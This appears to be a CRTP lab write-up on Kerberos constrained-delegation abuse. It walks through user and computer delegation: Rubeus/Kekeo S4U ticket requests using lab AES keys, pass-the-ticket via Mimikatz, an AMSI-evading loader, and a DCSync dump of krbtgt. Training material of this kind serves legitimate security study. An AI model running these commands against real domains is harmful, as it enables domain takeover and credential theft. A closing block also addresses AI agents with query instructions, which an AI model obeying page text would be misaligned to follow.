# CRTP Lab 16 ## Task 1 Enumerate **users** in the domain for whom Constrained Delegation is enabled. * For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured. * Pass the ticket and access the service Use Invishell to and use PowerView to enumerate users with constrained delegation enabled. ``` C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat PS C:\Users\student372> . C:\AD\Tools\PowerView.ps1 PS C:\Users\student372> Get-DomainUser -TrustedToAuth ``` WebSVC has constrained delegation enabled. Since we already have websvc creds, we can use them to access the CIFS/dcorp-mssql as a domain admin. As domain admin, we request TGS for websvc (first hop). This TGS is used to access the CIFS service. ### Abuse with Rubeus We use the websvc hash to request TGS as Domain Administrator from KDC and import it. {% code overflow="wrap" %} ``` # ArgSplit for "s4u" C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt klist ``` {% endcode %} Now we can access the CIFS service ``` C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$ ``` ### Abuse with Kekeo Request a TGT from websvc. {% code overflow="wrap" %} ``` C:\Windows\system32>cd C:\AD\Tools\kekeo\x64 C:\AD\Tools\kekeo\x64>.\kekeo.exe kekeo # tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 ``` {% endcode %} We can use this TGT to request a TGS. We are requesting TGS to access CIFS/dcorp-mssql as DA. {% code overflow="wrap" %} ``` kekeo # tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL ``` {% endcode %} Since the ticket is stored in a file, we can inject it in current session to use it. Open InviShell, Import Mimi, pass the ticket. {% code overflow="wrap" %} ``` C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat . C:\AD\Tools\Invoke-Mimi.ps1 Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"' ``` {% endcode %} We can now access the CIFS service. ``` C:\AD\Tools\kekeo\x64>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$ ``` ## Task 2 Enumerate **computer** accounts in the domain for which Constrained Delegation is enabled. * For such a user, request a TGT from the DC. * Obtain an alternate TGS for LDAP service on the target machine. * Use the TGS for executing DCSync attack. We use Invishell and import PowerView to find users with constrained delegation. ``` # InviShell and AMSI bypass, then PowerView: PS C:\AD\Tools\kekeo\x64> . C:\AD\Tools\PowerView.ps1 # Enumerate Computers with Constrained Delegation enabled PS C:\AD\Tools\kekeo\x64> Get-DomainComputer -TrustedToAuth ``` dcorp-adminsrv has constrained delegation. Since we have AES keys of adminsrv, we use Rubeus to impersonate as Domain Admin. {% code overflow="wrap" %} ``` # ArgSplit for s4u C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt ``` {% endcode %} To abuse LDAP ticket we just imported, we use DCSync to dump the secrets. {% code overflow="wrap" %} ``` # Notice that we can replace the service since it is not encrypted. So instead of TIME, we replaced it with LDAP. Can do HTTP as well. # ArgSplit lsadump::dcsync C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit" ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/kerberos-delegation/constrained-delegation/crtp-lab-16.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.